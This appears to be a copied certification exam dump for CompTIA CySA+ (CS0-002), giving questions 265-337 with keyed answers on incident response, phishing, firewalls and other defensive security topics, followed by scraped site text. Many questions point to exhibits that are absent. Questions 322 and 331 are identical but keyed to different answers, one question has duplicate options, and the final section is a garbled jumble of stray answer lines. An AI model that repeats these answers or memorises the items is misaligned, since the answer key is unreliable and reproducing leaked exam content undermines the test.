· During the deployment, the security assessment team was unfamiliar with the new language and struggled to evaluate the software during advanced
testing. Therefore, the vulnerability was not detected.
· The current IPS did not have effective signatures and policies in place to detect and prevent runtime attacks on the new application.
To allow this new technology to be deployed securely going forward, which of the following will BEST address these findings? (Choose two.)
A. Train the security assessment team to evaluate the new language and verify that best practices for secure coding have been followed
B. Work with the automated assessment-tool vendor to add support for the new language so these vulnerabilities are discovered automatically
C. Contact the human resources department to hire new security team members who are already familiar with the new language
D. Run the software on isolated systems so when they are compromised, the attacker cannot pivot to adjacent systems
E. Instruct only the development team to document the remediation steps for this vulnerability
F. Outsource development and hosting of the applications in the new language to a third-party vendor so the risk is transferred to that provider
Correct Answer: AB
QUESTION 266
Employees of a large financial company are continuously being infected by strands of malware that are not detected by EDR tools. Which of the
following is the BEST security control to implement to reduce corporate risk while allowing employees to exchange files at client sites?
A. MFA on the workstations

B. Additional host firewall rules
C. VDI environment
D. Hard drive encryption
E. Network access control
F. Network segmentation
Correct Answer: C
QUESTION 267
During an investigation, a security analyst determines suspicious activity occurred during the night shift over the weekend. Further investigation reveals
the activity was initiated from an internal IP going to an external website. Which of the following would be the MOST appropriate recommendation to
prevent similar activity from happening in the future?
A. An IPS signature modification for the specific IP addresses

B. An IDS signature modification for the specific IP addresses
C. A firewall rule that will block port 80 traffic
D. Implement a WAF to restrict malicious web content
Correct Answer: D
QUESTION 268
During a routine review of service restarts, a security analyst observes the following in a server log:
Which of the following is the GREATEST security concern?
A. The daemon's binary was changed.

B. Four consecutive days of monitoring are skipped in the log.
C. The process identifiers for the running service change.
D. The PIDs are continuously changing.
Correct Answer: A
QUESTION 269
Law enforcement officials have notified an organization that one of its internal servers is suspected of being a command-and-control server for a
malicious botnet. The organization's security analyst has been tasked with analyzing the internal server for indications of compromise. During the
investigation, the analyst reviews the processes running on the server and sees the following:
Which of the following processes warrants further investigation?
A. cmd.exe
B. iexplore
C. nc.exe
D. notepad.exe
Correct Answer: C
QUESTION 270
A company recently experienced multiple DNS DDoS attacks, and the information security analyst must provide a DDoS solution to deploy in the
company's data center. Which of the following would BEST prevent future attacks?
A. Route the queries on the DNS server to 127.0.0.1.

B. Buy a UTM to block the number of requests.
C. Call the internet service provider to block the attack.
D. Configure a sinkhole on the router.
Correct Answer: D
QUESTION 271
An organization was alerted to a possible compromise after its proprietary data was found for sale on the internet. An analyst is reviewing the logs from
the next-generation UTM in an attempt to find evidence of this breach. Given the following output:
Which of the following should be the focus of the investigation?
A. webserver.org-dmz.org
B. sftp.org-dmz.org
C. 83hht23.org-int.org
D. ftps.bluemed.net
Correct Answer: A
QUESTION 272
While planning segmentation for an ICS environment, a security engineer determines IT resources will need access to devices within the ICS
environment without compromising security. To provide the MOST secure access model in this scenario, the jumpbox should be:
A. placed in an isolated network segment, authenticated on the IT side, and forwarded into the ICS network.
B. placed on the ICS network with a static firewall rule that allows IT network resources to authenticate.
C. bridged between the IT and operational technology networks to allow authenticated access.
D. placed on the IT side of the network, authenticated, and tunneled into the ICS environment.
Correct Answer: D
QUESTION 273
Which of the following should a database administrator implement to BEST protect data from an untrusted server administrator?
A. Data deidentification
B. Data encryption
C. Data masking
D. Data minimization
Correct Answer: B
QUESTION 274
A developer is working on a program to convert user-generated input in a web form before it is displayed by the browser. The technique is referred to as:
A. Output encouting.
B. Data protection.
C. Query paramererization.
D. Input validation.
Correct Answer: A
QUESTION 275
A security team is struggling with alert fatigue, and the Chief Information Security Officer has decided to purchase a SOAR platform to alleviate this
issue. Which of the following BEST describes how a SOAR platform will help the security team?
A. SOAR will integrate threat intelligence into the alerts, which will help the security team decide which events should be investigated first.
B. A SOAR platform connects the SOC with the asset database, enabling the security team to make informed decisions immediately based on asset
criticality.
C. The security team will be able to use the SOAR framework to integrate the SIEM with a TAXII server, which has an automated intelligence feed that
will enhance the alert data.
D. Logic can now be created that will allow the SOAR platform to block specific traffic at the firewall according to predefined event triggers and actions.
Correct Answer: A
QUESTION 276
An analyst needs to forensically examine a Windows machine that was compromised by a threat actor. Intelligence reports state this specific threat actor
is characterized by hiding malicious artifacts, especially with alternate data streams. Based on this intelligence, which of the following BEST explains
alternate data streams?
A. A different way data can be streamlined if the user wants to use less memory on a Windows system for forking resources.
B. A way to store data on an external drive attached to a Windows machine that is not readily accessible to users.
C. A Windows attribute that provides for forking resources and is potentially used to hide the presence of secret or malicious files inside the file records
of a benign file.
D. A Windows attribute that can be used by attackers to hide malicious files within system memory.
Correct Answer: C
QUESTION 277
A security analyst is reviewing the network security monitoring logs listed below:
A. 10.1.1.128 sent potential malicious traffic to the web server

B. 10.1.1.128 sent malicious requests, and the alert is a false positive
C. 10.1.1.129 successfully exploited a vulnerability on the web server
D. 10.1.1.129 sent potential malicious requests to the web server
E. 10.1.1.129 sent non-malicious requests, and the alert is a false positive
F. 10.1.1.130 can potentially obtain information about the PHP version
Correct Answer: D
QUESTION 278
An analyst is reviewing the following output:
Vulnerability found: Improper neutralization of script-related HTML tag.
Which of the following was MOST likely used to discover this?
A. Reverse engineering using a debugger

B. A static analysis vulnerability scan
C. A passive vulnerability scan
D. A web application vulnerability scan
Correct Answer: D
QUESTION 279
An organization has been seeing increased levels of malicious traffic. A security analyst wants to take a more proactive approach to identify the threats
that are acting against the organization's network. Which of the following approaches should the security analyst recommend?
A. Use the MITRE ATT&CK framework to develop threat models.

B. Conduct internal threat research and establish indicators of compromise.
C. Review the perimeter firewall rules to ensure the accuracy of the rule set.
D. Use SCAP scans to monitor for configuration changes on the network.
Correct Answer: B
QUESTION 280
An organization recently discovered some inconsistencies in the motherboards it received from a vendor. The organization's security team then provided
guidance on how to ensure the authenticity of the motherboards it received from vendors. Which of the following would be the BEST recommendation
for the security analyst to provide?
A. The organization should use a certified, trusted vendor as part of the supply chain.
B. The organization should evaluate current NDAs to ensure enforceability of legal actions.
C. The organization should maintain the relationship with the vendor and enforce vulnerability scans.
D. The organization should ensure all motherboards are equipped with a TPM.
Correct Answer: A
QUESTION 281
An online gaming company was impacted by a ransomware attack. An employee opened an attachment that was received via an SMS attack on a
company-issued mobile device while connected to the network. Which of the following actions would help during the forensic analysis of the mobile
device? (Choose two.)
A. Resetting the phone to factory settings

B. Rebooting the phone and installing the latest security updates
C. Documenting the respective chain of custody
D. Uninstalling any potentially unwanted programs
E. Performing a memory dump of the mobile device for analysis
F. Unlocking the device by blowing the eFuse
Correct Answer: CE
QUESTION 282
The help desk provided a security analyst with a screenshot of a user's desktop:
For which of the following is aircrack-ng being used?
A. Wireless access point discovery

B. Rainbow attack
C. Brute-force attack
D. PCAP data collection
Correct Answer: C
QUESTION 283
An organizational policy requires one person to input accounts payable and another to do accounts receivable. A separate control requires one person to
write a check and another person to sign all checks greater than $5.000 and to get an additional signature for checks greater than $10,000. Which of the
following controls has the organization implemented?
A. Segregation of duties
B. Job rotation
C. Non-repudiation
D. Dual control
Correct Answer: A
QUESTION 284
An incident response team is responding to a breach of multiple systems that contain PII and PHI. Disclosure of the incident to external entities should
be based on:
A. the responder's discretion.

B. the public relations policy.
C. the communication plan.
D. the senior management team's guidance.
Correct Answer: C
QUESTION 285
A new on-premises application server was recently installed on the network. Remote access to the server was enabled for vendor support on required
ports, but recent security reports show large amounts of data are being sent to various unauthorized networks through those ports. Which of the
following configuration changes must be implemented to resolve this security issue while still allowing remote vendor access?
A. Apply a firewall application server rule.

B. Add the application server to the allow list.
C. Sandbox the application server.
D. Enable port security.
E. Block the unauthorized networks.
Correct Answer: E
QUESTION 286
A company employee downloads an application from the internet. After the installation, the employee begins experiencing noticeable performance
issues, and files are appearing on the desktop:
Which of the following processes will the security analyst identify as the MOST likely indicator of system compromise given the processes running in
Task Manager?
A. Chrome.exe
B. Word.exe
C. Explorer.exe
D. mstsc.exe
E. taskmgr.exe
Correct Answer: D
QUESTION 287
An organization is adopting IoT devices at an increasing rate and will need to account for firmware updates in its vulnerability management programs.
Despite the number of devices being deployed, the organization has only focused on software patches so far, leaving hardware-related weaknesses
open to compromise. Which of the following best practices will help the organization to track and deploy trusted firmware updates as part of its
vulnerability management programs?
A. Utilize threat intelligence to guide risk evaluation activities and implement critical updates after proper testing.
B. Apply all firmware updates as soon as they are released to mitigate the risk of compromise.
C. Determine an annual patch cadence to ensure all patching occurs at the same time.
D. Implement an automated solution that detects when vendors release firmware updates and immediately deploy updates to production.
Correct Answer: A
QUESTION 288
Which of the following is a reason to use a risk-based cybersecurity framework?
A. A risk-based approach always requires quantifying each cyber risk faced by an organization.
B. A risk-based approach better allocates an organization's resources against cyberthreats and vulnerabilities.
C. A risk-based approach is driven by regulatory compliance and is required for most organizations.
D. A risk-based approach prioritizes vulnerability remediation by threat hunting and other qualitative-based processes.
Correct Answer: B
QUESTION 289
A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command
execution through an integer overflow:
Which of the following controls must be in place to prevent this vulnerability?
A. Convert all integer numbers in strings to handle the memory buffer correctly.
B. Implement float numbers instead of integers to prevent integer overflows.
C. Use built-in functions from libraries to check and handle long numbers properly.
D. Sanitize user inputs, avoiding small numbers that cannot be handled in the memory.
Correct Answer: D
QUESTION 290
An analyst is participating in the solution analysis process for a cloud-hosted SIEM platform to centralize log monitoring and alerting capabilities in the
SOC. Which of the following is the BEST approach for supply chain assessment when selecting a vendor?
A. Gather information from providers, including data center specifications and copies of audit reports
B. Identify SLA requirements for monitoring and logging
C. Consult with the senior management team for recommendations
D. Perform a proof of concept to identify possible solutions
Correct Answer: A
QUESTION 291
An analyst is investigating an anomalous event reported by the SOC. After reviewing the system logs; the analyst identifies an unexpected addition of a
user with root-level privileges on the endpoint. Which of the following data sources will BEST help the analyst to determine whether this event constitutes
an incident?
A. Patching logs
B. Threat feed
C. Backup logs
D. Change requests
E. Data classification matrix
Correct Answer: D
QUESTION 292
A security analyst is reviewing WAF logs and notes requests against the corporate website are increasing and starting to impact the performance of the
web server. The security analyst queries the logs for requests that triggered an alert on the WAF but were not blocked. Which of the following possible
TTP combinations might warrant further investigation? (Choose two.)
A. Requests identified by a threat intelligence service with a bad reputation

B. Requests sent from the same IP address using different user agents
C. Requests blocked by the web server per the input sanitization
D. Failed log-in attempts against the web application
E. Requests sent by NICs with outdated firmware
F. Existence of HTTP/501 status codes generated to the same IP address
Correct Answer: BF
QUESTION 293
Which of the following roles is ultimately responsible for determining the classification levels assigned to specific data sets?
A. Data custodian
B. Data owner
C. Data processor
D. Senior management
Correct Answer: B
QUESTION 294
An analyst is reviewing the output from some recent network enumeration activities. The following entry relates to a target on the network:
Based on the Nmap output above, which of the following features is running on the router?
A. Web application firewall

B. Port triggering
C. Intrusion prevention system
D. Port isolation
E. Port address translation
Correct Answer: A
QUESTION 295
The inability to do remote updates of certificates, keys, software, and firmware is a security issue commonly associated with:
A. web servers on private networks.

B. HVAC control systems.
C. smartphones.
D. firewalls and UTM devices.
Correct Answer: B
QUESTION 296
A cybersecurity analyst is working with a SIEM tool and reviewing the following table:
When creating a rule in the company's SIEM, which of the following would be the BEST approach for the analyst to use to assess the risk level of each
vulnerability that is discovered by the vulnerability assessment tool?
A. Create a trend with the table and join the trend with the desired rule to be able to extract the risk level of each vulnerability
B. Use Boolean filters in the SIEM rule to take advantage of real-time processing and RAM to store the table dynamically, generate the results faster,
and be able to display the table in a dashboard or export it as a report
C. Use a static table stored on the disk of the SIEM system to correlate its data with the data ingested by the vulnerability scanner data collector
D. Use the table as a new index or database for the SIEM to be able to use multisearch and then summarize the results as output
Correct Answer: B
QUESTION 297
A security analyst has discovered that developers have installed browsers on all development servers in the company's cloud infrastructure and are
using them to browse the internet. Which of the following changes should the security analyst make to BEST protect the environment?
A. Create a security rule that blocks internet access in the development VPC
B. Place a jumpbox in between the developers' workstations and the development VPC
C. Remove the administrator's profile from the developer user group in identity and access management
D. Create an alert that is triggered when a developer installs an application on a server
Correct Answer: A
QUESTION 298
A customer notifies a security analyst that a web application is vulnerable to information disclosure. The analyst needs to indicate the severity of the
vulnerability based on its CVSS score, which the analyst needs to calculate. When analyzing the vulnerability, the analyst realizes that for the attack to
be successful, the Tomcat configuration file must be modified. Which of the following values should the security analyst choose when evaluating the
CVSS score?
A. Network
B. Physical
C. Adjacent
D. Local
Correct Answer: D
QUESTION 299
A security analyst was transferred to an organization's threat-hunting team to track specific activity throughout the enterprise environment. The analyst
must observe and assess the number of times this activity occurs and aggregate the results. Which of the following is the BEST threat-hunting method
for the analyst to use?
A. Stack counting
B. Searching
C. Clustering
D. Grouping
Correct Answer: A
QUESTION 300
A security analyst is building a malware analysis lab. The analyst wants to ensure malicious applications are not capable of escaping the virtual
machines and pivoting to other networks. To BEST mitigate this risk, the analyst should use:
A. an 802.11 ac wireless bridge to create an air gap.

B. a managed switch to segment the lab into a separate VLAN.
C. a firewall to isolate the lab network from all other networks.
D. an unmanaged switch to segment the environments from one another.
Correct Answer: C
QUESTION 301
A security analyst is attempting to resolve an incident in which highly confidential company pricing information was sent to clients. It appears this
information was unintentionally sent by an employee who attached it to public marketing material. Which of the following configuration changes would
work BEST to limit the risk of this incident being repeated?
A. Add client addresses to the blocklist

B. Update the DLP rules and metadata
C. Sanitize the marketing material
D. Update the insider threat procedures
Correct Answer: B
QUESTION 302
Which of the following techniques can be implemented to safeguard the confidentiality of sensitive information while allowing limited access to
authorized individuals?
A. Deidentification
B. Hashing
C. Masking
D. Salting
Correct Answer: C
QUESTION 303
During an incident response procedure, a security analyst acquired the needed evidence from the hard drive of a compromised machine. Which of the
following actions should the analyst perform NEXT to ensure the data integrity of the evidence?
A. Generate hashes for each file from the hard drive.

B. Create a chain of custody document.
C. Determine a timeline of events using correct time synchronization.
D. Keep the cloned hard drive in a safe place.
Correct Answer: B
QUESTION 304
A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is
shown below:
Office 365 User,
It looks like your account has been locked out. Please click this http://accountfix-office356 com/login.php and follow the prompts to restore access.
Regards,
Security Team -
Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network
traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?
A. telnet off1ce365.com 25
B. tracert 122.167.40.119
C. curl http://accountfix-office356.com/login.php
D. nslookup accountfix-office356.com
Correct Answer: D
QUESTION 305
A security analyst discovers a vulnerability on an unpatched web server that is used for testing machine learning on Big Data sets Exploitation of the
vulnerability could cost the organization $1.5 million in lost productivity. The server is located on an isolated network segment that has a 5% chance of
being compromised. Which of the following is the value of this risk?
A. $75,000
B. $300,000
C. $1,425 million
D. $1.5 million
Correct Answer: A
QUESTION 306
A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company
executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. An AAAA record on the name server for SPF

B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail
Correct Answer: C
QUESTION 307
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is
concerned with ensuring all devices are patched and running some sort of protection against malicious software. Which of the following existing
technical controls should a security analyst recommend to BEST meet all the requirements?
A. EDR
B. Port security
C. NAC
D. Segmentation
Correct Answer: A
QUESTION 308
An employee in the billing department accidentally sent a spreadsheet containing payment card data to a recipient outside the organization. The
employee intended to send the spreadsheet to an internal staff member with a similar name and was unaware of the mistake until the recipient replied to
the message. In addition to retraining the employee, which of the following would prevent this from happening in the future?
A. Implement outgoing filter rules to quarantine messages that contain card data.
B. Configure the outgoing mail filter to allow attachments only to addresses on the allow list.
C. Remove all external recipients from the employee's address book.
D. Set the outgoing mail filter to strip spreadsheet attachments from all messages.
Correct Answer: A
QUESTION 309
A security analyst working in the SOC recently discovered instances in which hosts visited a specific set of domains and IPs and became infected with
malware. Which of the following is the MOST appropriate action to take in this situation?
A. Implement an IPS signature for the malware and update the deny list for the associated domains and IPs
B. Implement an IPS signature for the malware and another signature request to block all the associated domains and IPs
C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains
D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs' subnets and
second-level domains
Correct Answer: D
QUESTION 310
Which of the following solutions is the BEST method to prevent unauthorized use of an API?
A. HTTPS
B. Geofencing
C. Rate limiting
D. Authentication
Correct Answer: D
QUESTION 311
A security analyst at a technology solutions firm has uncovered the same vulnerabilities on a vulnerability scan for a long period of time. The
vulnerabilities are on systems that are dedicated to the firm's largest client. Which of the following is MOST likely inhibiting the remediation efforts?
A. The parties have an MOU between them that could prevent shutting down the systems
B. There is a potential disruption of the vendor-client relationship
C. Patches for the vulnerabilities have not been fully tested by the software vendor
D. There is an SLA with the client that allows very little downtime
Correct Answer: D
QUESTION 312
A security manager has asked an analyst to provide feedback on the results of a penetration test. After reviewing the results, the manager requests
information regarding the possible exploitation of vulnerabilities. Which of the following information data points would be MOST useful for the analyst to
provide to the security manager, who would then communicate the risk factors to the senior management team? (Choose two.)
A. Probability
B. Adversary capability
C. Attack vector
D. Impact
E. Classification
F. Indicators of compromise
Correct Answer: AD
QUESTION 313
During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into
consideration. Which of the following are part of a known threat modeling method?
A. Threat profile, infrastructure and application vulnerabilities, security strategy and plans
B. Purpose, objective, scope, team management, cost, roles and responsibilities
C. Spoofing, tampering, repudiation, information disclosure, denial of service, elevation of privilege
D. Human impact, adversary's motivation, adversary's resources, adversary's methods
Correct Answer: C
QUESTION 314
A systems administrator believes a user's workstation has been compromised. The workstation's performance has been lagging significantly for the past
several hours. The administrator runs the task list /v command and receives the following output:
Which of the following should a security analyst recognize as an indicator of compromise?
A. dwm.exe being executed under the user context

B. The high memory usage of vscode.exe*32
C. The abnormal behavior of paint.exe
D. svchost.exe being executed as SYSTEM
Correct Answer: C
QUESTION 315
Which of the following BEST describes HSM?
A. A computing device that manages cryptography, decrypts traffic, and maintains library calls
B. A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions
C. A computing device that manages physical keys, encrypts devices, and creates strong cryptographic functions
D. A computing device that manages algorithms, performs entropy functions, and maintains digital signatures
Correct Answer: B
QUESTION 316
An organization discovers motherboards within the environment that appear to have been physically altered during the manufacturing process. Which of
the following is the BEST course of action to mitigate the risk of this reoccurring?
A. Perform an assessment of the firmware to determine any malicious modifications.

B. Conduct a trade study to determine if the additional risk constitutes further action.
C. Coordinate a supply chain assessment to ensure hardware authenticity
D. Work with IT to replace the devices with the known-altered motherboards.
Correct Answer: C
QUESTION 317
A security analyst is reviewing a suspected phishing campaign that has targeted an organization. The organization has enabled a few email security
technologies in the last year:
however, the analyst believes the security features are not working. The analyst runs the following command:
> dig domain._domainkey.comptia.org TXT
Which of the following email protection technologies is the analyst MOST likely validating?
A. SPF
B. DNSSEC
C. DMARC
D. DKIM
Correct Answer: D
QUESTION 318
A cybersecurity analyst is reading a daily intelligence digest of new vulnerabilities. The type of vulnerability that should be disseminated FIRST is one
that:
A. enables remote code execution that is being exploited in the wild.

B. enables data leakage but is not known to be in the environment.
C. enables lateral movement and was reported as a proof of concept.
D. affected the organization in the past but was probably contained and eradicated.
Correct Answer: A
QUESTION 319
A developer wrote a script to make names and other PII data unidentifiable before loading a database export into the testing system. Which of the
following describes the type of control that is being used?
A. Data encoding
B. Data masking
C. Data loss prevention
D. Data classification
Correct Answer: B
QUESTION 320
A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output:
Which of the following commands should the administrator run NEXT to further analyze the compromised system?
A. strace /proc/1301
B. rpm -V openssh-server
C. /bin/ls -1 /proc/1301/exe
D. kill -9 1301
Correct Answer: C
QUESTION 321
HOTSPOT
-
Malware is suspected on a server in the environment.
The analyst is provided with the output of commands from servers in the environment and needs to review all output files in order to determine which
process running on one of the servers may be malware.
INSTRUCTIONS
-
Servers 1, 2, and 4 are clickable. Select the Server and the process that host the malware.
A. Answer: See explanation below. Server 4, Svchost.exe -
B.
C.
D.
Correct Answer: A
QUESTION 322
A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-
side vulnerabilities:
Alert Detail -
Low (Medium) Web Browser XSS Protection not enabled Description: Web browser XSS protection not enabled, or disabled by the configuration of the
HTTP Response header
URL: https://domain.com/sun/ray -
Which of the following is the MOST likely solution to the listed vulnerability?
A. Enable the browsers XSS filter

B. Enable Windows XSS protection.
C. Enable the browser's protected pages mode.
D. Enable server-side XSS protection.
Correct Answer: D
QUESTION 323
A new variant of malware is spreading on the company network using TCP/443 to contact its command-and-control server. The domain name used for
callback continues to change, and the analyst is unable to predict future domain name variance. Which of the following actions should the analyst take to
stop malicious communications with the LEAST disruption to service?
A. Implement a sinkhole with a high entropy level.

B. Disable TCP/53 at the perimeter firewall.
C. Block TCP/443 at the edge router.
D. Configure the DNS forwarders to use recursion.
Correct Answer: A
QUESTION 324
An email analysis system notifies a security analyst that the following message was quarantined and requires further review.
From: CEO@CompTIA.org
To: Purchasing@CompTIA.org
Subject: [EXTERNAL] Gift card purchase ASAP
Body:
Please purchase gift cards to any major electronics store and reply with pictures of them to this email!
Which of the following actions should the security analyst take?
A. Release the email for delivery due to its importance.

B. Immediately contact a purchasing agent to expedite.
C. Delete the email and block the sender.
D. Purchase the gift cards and submit an expense report
Correct Answer: C
QUESTION 325
A security analyst is conducting a post-incident log analysis to determine which indicators can be used to detect further occurrences of a data exfiltration
incident. The analyst determines backups were not performed during this time and reviews the following:
Which of the following should the analyst review to find out how the data was exfiltrated?
A. Monday's logs
B. Tuesday's logs
C. Wednesday's logs
D. Thursday's logs
Correct Answer: D
QUESTION 326
HOTSPOT
-
The developers recently deployed new code to three web servers. A daily automated external device scan report shows server vulnerabilities that are
failing items according to PCI DSS. If the vulnerability is not valid, the analyst must take the proper steps to get the scan clean.
If the vulnerability is valid, the analyst must remediate the finding.
After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the simulation by selecting the correct Validation
Result and Remediation Action for each server listed using the drop-down options.
INSTRUCTIONS
-
STEP 1: Review the information provided in the network diagram.
STEP 2: Given the scenario, determine which remediation action is required to address the vulnerability.
Step 1
-
Step 2:
A.
B.
C.
D.
Correct Answer: A
QUESTION 327
An organization's Chief Information Security Officer has asked department leaders to coordinate on communication plans that can be enacted in
response to different cybersecurity incident triggers.
Which of the following is a benefit of having these communication plans?
A. They can help to prevent the inadvertent release of damaging information outside the organization
B. They can help to limit the spread of worms by coordinating with help desk personnel earlier in the recovery phase.
C. They can quickly inform the public relations team to begin coordinating with the media as soon as a breach is detected
D. They can help to keep the organization's senior leadership informed about the status of patching during the recovery phase
Correct Answer: A
QUESTION 328
A network attack that is exploiting a vulnerability in the SNMP is detected. Which of the following should the cybersecurity analyst do FIRST?
A. Apply the required patches to remediate the vulnerability

B. Escalate the incident to the senior management team for guidance
C. Disable all privileged user accounts on the network
D. Temporarily block the attacking IP address
Correct Answer: D
QUESTION 329
A general contractor has a list of contract documents containing critical business data that are stored at a public cloud provider. The organization's
security analyst recently reviewed some of the storage containers and discovered most of the containers are not encrypted. Which of the following
configurations will provide the MOST security to resolve the vulnerability?
A. Upgrading TLS 1.2 connections to TLS 1.3

B. Implementing AES-256 encryption on the containers
C. Enabling SHA-256 hashing on the containers
D. Implementing the Triple Data Encryption Algorithm at the file level
Correct Answer: B
QUESTION 330
An analyst is reviewing the following output as part of an incident:
Which of the following is MOST likely happening?
A. The hosts are part of a reflective denial-of-service attack

B. Information is leaking from the memory of host 10.20.30.40
C. Sensitive data is being exfiltrated by host 192.168.1.10
D. Host 192.168.1.10 is performing firewall port knocking
Correct Answer: C
QUESTION 331
A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-
side vulnerabilities:
Which of the following is the MOST likely solution to the listed vulnerability?
A. Enable the browser's XSS filter.

B. Enable Windows XSS protection.
C. Enable the private browsing mode.
D. Enable server-side XSS protection.
Correct Answer: A
QUESTION 332
A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is
shown below:
Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network
traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?
A. telnet off1ce365.com 25
B. tracert 122.167.40.119
C. curl http://accountfix-office356.com/login.php
D. nslookup accountfix-office356.com
Correct Answer: D
QUESTION 333
During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in
confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the
following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
A. Share details of the security incident with the organization's human resources management team.
B. Note the security incident to junior analysts so they are aware of the traffic.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident for inclusion in the daily report.
Correct Answer: C
QUESTION 334
Given the Nmap request below:
Which of the following actions will an attacker be able to initiate directly against this host?
A. Password sniffing
B. ARP spoofing
C. A brute-force attack
D. An SQL injection
Correct Answer: C
QUESTION 335
A security analyst receives a report indicating a system was compromised due to malware that was downloaded from the internet using TFTP. The
analyst is instructed to block TFTP at the corporate firewall. Given the following portion of the current firewall rule set:
Which of the following rules should be added to accomplish this goal?
A. UDP ANY ANY ANY 20 Deny

B. UDP ANY ANY 69 69 Deny
C. UDP ANY ANY 67 68 Deny
D. UDP ANY ANY ANY 69 Deny
E. UDP ANY ANY ANY 69 Deny
Correct Answer: D
QUESTION 336
A security analyst found the following entry in a server log:
The analyst executed netstat and received the following output:
Which of the following lines in the output confirms this was successfully executed by the server?
A. 1
B. 2
C. 3
D. 4
E. 5
F. 6
G. 7
Correct Answer: E
QUESTION 337
Which of the following weaknesses associated with common SCADA systems are the MOST critical for organizations to address architecturally within
their networks? (Choose two.)
A. Boot processes that are neither measured nor attested

B. Legacy and unpatchable systems software
C. Unnecessary open ports and protocols
D. No OS kernel mandatory access controls
E. Unauthenticated commands
F. Insecure filesystem permissions
Correct Answer: BE

Comptia CS0-002 May 2023-v1.5

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Comptia CS0-002 May 2023-v1.5

Uploaded by

Copyright:

Available Formats

CCIEHOMER We provide Pratice Test's in PDF and VCE format.

FREE VCE PLAYER

CompTIA Cybersecurity Analyst (CySA+)

Exam Name: CompTIA Cybersecurity Analyst (CySA+)

Developed by: Hussain & Evan

A. Security regression testing

Which of the following is MOST likely occurring?

A. SMS relies on untrusted, third-party carrier networks.

You must determine:

A. Answer: See explanation below.

[SMBv2] NTLMv2-SSP Username : CORP\progers

A. Data masking procedures

Which of the following ports should be closed?

A. Answer: See explanation below.

A. detection and prevention capabilities to improve.

A. Open the access.log file in read/write mode.

Follow TCP stream:

Which of the following describes what has occurred?

A. The host attempted to download an application from utoftor.com.

A. Moving to a cloud-based environment

B. Migrating to locally hosted virtual servers

A. Contact the CRM vendor.

A. There is a longer period of time to assess the environment.

A. Answer: See explanation below.

A. Hire a managed service provider to help with vulnerability management

A. Require the guest machines to install the corporate-owned EDR solution

A. Disable the privileged account.

A. Message queuing telemetry transport does not support encryption.

A. The use of a TLS cipher

A. Deploy an edge firewall.

A. The implementation of confidentiality, integrity, and availability

A. Perform an enterprise-wide discovery scan.

A. Deploying HIPS to block malicious ActiveX code

A. Validate the binaries' hashes from a trusted source.

A. more webserver.log | grep *.xls > accessreport.txt

A. A dynamic library that is needed by the executable is missing.

A. Update the whitelist.

A. Switch to RADIUS technology.

A. Check industry news feeds for product reviews.

A. Virtualize the system and decommission the physical machine.

A. The Cyber Kill Chain

A. Implement a UTM instead of a stateful firewall and enable gateway antivirus.

A. Improving detection capabilities

A. Blacklist the hash in the next-generation antivirus system.

A. Implement UEM on all systems and deploy security software.

A. Patch or reimage the device to complete the recovery.

A. Implement a better level of user input filters and content sanitization.

A. Use TLS for all data exchanges.

A. a vulnerability management plan.

A. System timeline reconstruction

A. A TXT record on the name server for SPF

prevent similar activity from happening in the future?

A. An IPS signature modification for the specific IP addresses

A. Require all remote employees to sign an NDA.

A. Perform password-cracking attempts on all devices going into production

A. Remote code execution

A. To prevent adversaries from intercepting response and recovery details

A. Delete the vulnerable section of the code immediately.

A. Vulnerability scans of the network and proper patching

A. To identify weaknesses in an organization's security posture

A. To create a system baseline

A. Requirements analysis and collection planning

A. Change the passwords on the devices.